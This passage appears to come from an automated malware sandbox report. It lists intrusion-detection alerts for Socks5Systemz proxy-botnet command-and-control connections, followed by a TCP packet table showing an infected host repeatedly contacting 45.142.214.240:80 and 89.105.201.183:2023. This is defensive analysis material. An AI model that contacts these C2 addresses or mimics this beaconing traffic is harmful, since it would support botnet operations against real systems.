                                                                          03/29/24-12:10:29.343836TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976780192.168.2.545.142.214.240
                                                                          03/29/24-12:10:25.092185TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:35.156161TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:45.795139TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:42.173450TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978580192.168.2.545.142.214.240
                                                                          03/29/24-12:09:52.762235TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:37.498093TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:49.656205TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979480192.168.2.545.142.214.240
                                                                          03/29/24-12:10:10.485514TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:16.841602TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:47.724356TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:39.408449TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:21.519109TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:19.594654TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975580192.168.2.545.142.214.240
                                                                          03/29/24-12:10:14.920798TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:27.424287TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976480192.168.2.545.142.214.240
                                                                          03/29/24-12:09:58.919317TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:20.874262TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975780192.168.2.545.142.214.240
                                                                          03/29/24-12:10:43.222189TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:38.127296TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978080192.168.2.545.142.214.240
                                                                          03/29/24-12:09:53.388422TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:26.780979TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:53.501609TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14980080192.168.2.545.142.214.240
                                                                          03/29/24-12:10:30.625360TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:52.218008TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979880192.168.2.545.142.214.240
                                                                          03/29/24-12:09:49.624355TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14971680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:07.520008TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974080192.168.2.545.142.214.240
                                                                          03/29/24-12:10:34.518099TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977580192.168.2.545.142.214.240
                                                                          03/29/24-12:10:03.645340TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973480192.168.2.545.142.214.240
                                                                          03/29/24-12:10:26.142227TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:02.989420TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:29.982779TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:51.565445TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979780192.168.2.545.142.214.240
                                                                          03/29/24-12:10:06.876572TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:33.860666TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977480192.168.2.545.142.214.240
                                                                          03/29/24-12:09:58.280004TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972780192.168.2.545.142.214.240
                                                                          03/29/24-12:10:16.200826TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:48.356929TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:08.153311TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:09.844842TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974480192.168.2.545.142.214.240
                                                                          03/29/24-12:10:04.284502TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973580192.168.2.545.142.214.240
                                                                          03/29/24-12:10:52.864072TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:49.012408TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:17.904399TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975380192.168.2.545.142.214.240
                                                                          03/29/24-12:09:59.565419TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:20.232000TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:06.232200TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:11.167852TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974780192.168.2.545.142.214.240
                                                                          03/29/24-12:10:38.765184TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:47.079531TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979080192.168.2.545.142.214.240
                                                                          03/29/24-12:09:52.123640TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972080192.168.2.545.142.214.240
                                                                          03/29/24-12:10:41.536693TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978480192.168.2.545.142.214.240
                                                                          03/29/24-12:10:43.860067TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978780192.168.2.545.142.214.240
                                                                          03/29/24-12:09:57.218726TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:36.862357TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:15.568464TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975080192.168.2.545.142.214.240
                                                                          03/29/24-12:09:54.451755TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:02.326674TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:50.920566TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979680192.168.2.545.142.214.240
                                                                          03/29/24-12:09:55.746985TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972580192.168.2.545.142.214.240
                                                                          03/29/24-12:10:18.951435TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975480192.168.2.545.142.214.240
                                                                          03/29/24-12:10:46.435554TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:40.888750TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:01.265583TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:50.283368TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14979580192.168.2.545.142.214.240
                                                                          03/29/24-12:10:05.594232TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973780192.168.2.545.142.214.240
                                                                          03/29/24-12:09:51.076317TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14971980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:13.452004TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974880192.168.2.545.142.214.240
                                                                          03/29/24-12:10:31.920222TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977180192.168.2.545.142.214.240
                                                                          03/29/24-12:10:28.703817TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976680192.168.2.545.142.214.240
                                                                          03/29/24-12:10:00.203383TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973080192.168.2.545.142.214.240
                                                                          03/29/24-12:10:32.566269TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977280192.168.2.545.142.214.240
                                                                          03/29/24-12:09:55.106879TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14972480192.168.2.545.142.214.240
                                                                          03/29/24-12:10:28.062365TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976580192.168.2.545.142.214.240
                                                                          03/29/24-12:09:48.936277TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14971380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:36.217358TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977780192.168.2.545.142.214.240
                                                                          03/29/24-12:10:22.983300TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975980192.168.2.545.142.214.240
                                                                          03/29/24-12:10:09.201668TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14974280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:23.628743TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14976080192.168.2.545.142.214.240
                                                                          03/29/24-12:10:04.939736TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14973680192.168.2.545.142.214.240

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 29, 2024 12:09:45.197357893 CET4971280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:45.418050051 CET804971245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:45.418313026 CET4971280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:45.420994043 CET4971280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:45.641526937 CET804971245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:45.725605965 CET804971245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:45.725667000 CET4971280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:45.843434095 CET4971280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:45.843868971 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:46.064188004 CET804971245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:46.064270020 CET4971280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:46.064341068 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:46.064419031 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:46.064559937 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:46.285410881 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:46.396110058 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:46.396125078 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:46.396133900 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:46.396186113 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:46.396225929 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:46.397780895 CET497142023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:46.574423075 CET20234971489.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:46.574520111 CET497142023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:46.574587107 CET497142023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:46.751070976 CET20234971489.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:46.751132011 CET497142023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:46.929198980 CET20234971489.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:46.929496050 CET20234971489.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:46.979989052 CET497142023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:48.936276913 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.156864882 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.290200949 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.290409088 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.404859066 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.405230999 CET4971680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.623848915 CET804971645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.624174118 CET4971680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.624355078 CET4971680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.625291109 CET804971345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.626215935 CET4971380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.843043089 CET804971645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.931559086 CET804971645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.931572914 CET804971645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:49.931696892 CET4971680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:49.932878017 CET497172023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:50.108164072 CET20234971789.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:50.108246088 CET497172023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:50.108319998 CET497172023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:50.108370066 CET497172023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:50.217657089 CET4971680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.217991114 CET4971880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.283684015 CET20234971789.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:50.283699036 CET20234971789.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:50.284740925 CET20234971789.105.201.183192.168.2.5
                                                                          Mar 29, 2024 12:09:50.284787893 CET497172023192.168.2.589.105.201.183
                                                                          Mar 29, 2024 12:09:50.436357021 CET804971645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:50.436427116 CET4971680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.438590050 CET804971845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:50.438663960 CET4971880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.438858986 CET4971880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.659360886 CET804971845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:50.743694067 CET804971845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:50.743772030 CET4971880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.857911110 CET4971880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:50.858256102 CET4971980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.076069117 CET804971945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:51.076160908 CET4971980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.076317072 CET4971980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.078501940 CET804971845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:51.078576088 CET4971880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.293808937 CET804971945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:51.380537033 CET804971945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:51.384157896 CET4971980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.498270035 CET4971980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.498547077 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.715812922 CET804971945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:51.715893984 CET4971980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.717698097 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:51.717778921 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.717952967 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:51.937108994 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.015934944 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.016000032 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.123640060 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.343316078 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.426903963 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.426965952 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.545097113 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.545388937 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.761989117 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.762087107 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.762234926 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.764368057 CET804972045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:52.764437914 CET4972080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:52.978826046 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.057368994 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.057449102 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.170212030 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.170497894 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.388156891 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.388274908 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.388422012 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.399872065 CET804972145.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.400021076 CET4972180192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.606055021 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.693662882 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:53.693747997 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.810852051 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:53.811131954 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.029504061 CET804972245.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.029598951 CET4972280192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.033225060 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.033298969 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.033443928 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.255656958 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.343990088 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.344059944 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.451755047 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.673973083 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.752840042 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:54.752897978 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.873255968 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:54.873538971 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.095577002 CET804972345.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.095669031 CET4972380192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.106574059 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.106677055 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.106878996 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.328385115 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.416470051 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.416733027 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.529854059 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.530236006 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.746736050 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.746927023 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.746984959 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.748971939 CET804972445.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:55.749047041 CET4972480192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:55.963228941 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.042346954 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.042440891 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.170717001 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.171078920 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.394764900 CET804972545.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.394954920 CET4972580192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.395085096 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.395160913 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.395343065 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.612833023 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.701100111 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:56.701188087 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:56.811413050 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.029048920 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.108319044 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.108494997 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.218725920 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.436541080 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.524729013 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.524833918 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.639239073 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.639602900 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.856870890 CET804972645.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.857044935 CET4972680192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.861933947 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:57.862031937 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:57.862262964 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.084722042 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.170133114 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.170341969 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.280004025 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.503022909 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.582115889 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.582199097 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.701783895 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.702478886 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.918992043 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.919095993 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.919317007 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:58.924187899 CET804972745.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:58.924257040 CET4972780192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.135596991 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.228439093 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.228524923 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.341824055 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.342129946 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.558181047 CET804972845.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.558273077 CET4972880192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.564382076 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.564472914 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.565418959 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.787991047 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.866986990 CET804972945.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:09:59.867069960 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.982947111 CET4972980192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:09:59.983247042 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.203130007 CET804973045.142.214.240192.168.2.5
                                                                          Mar 29, 2024 12:10:00.203228951 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.203382969 CET4973080192.168.2.545.142.214.240
                                                                          Mar 29, 2024 12:10:00.205538988 CET804972945.142.214.240192.168.2.5
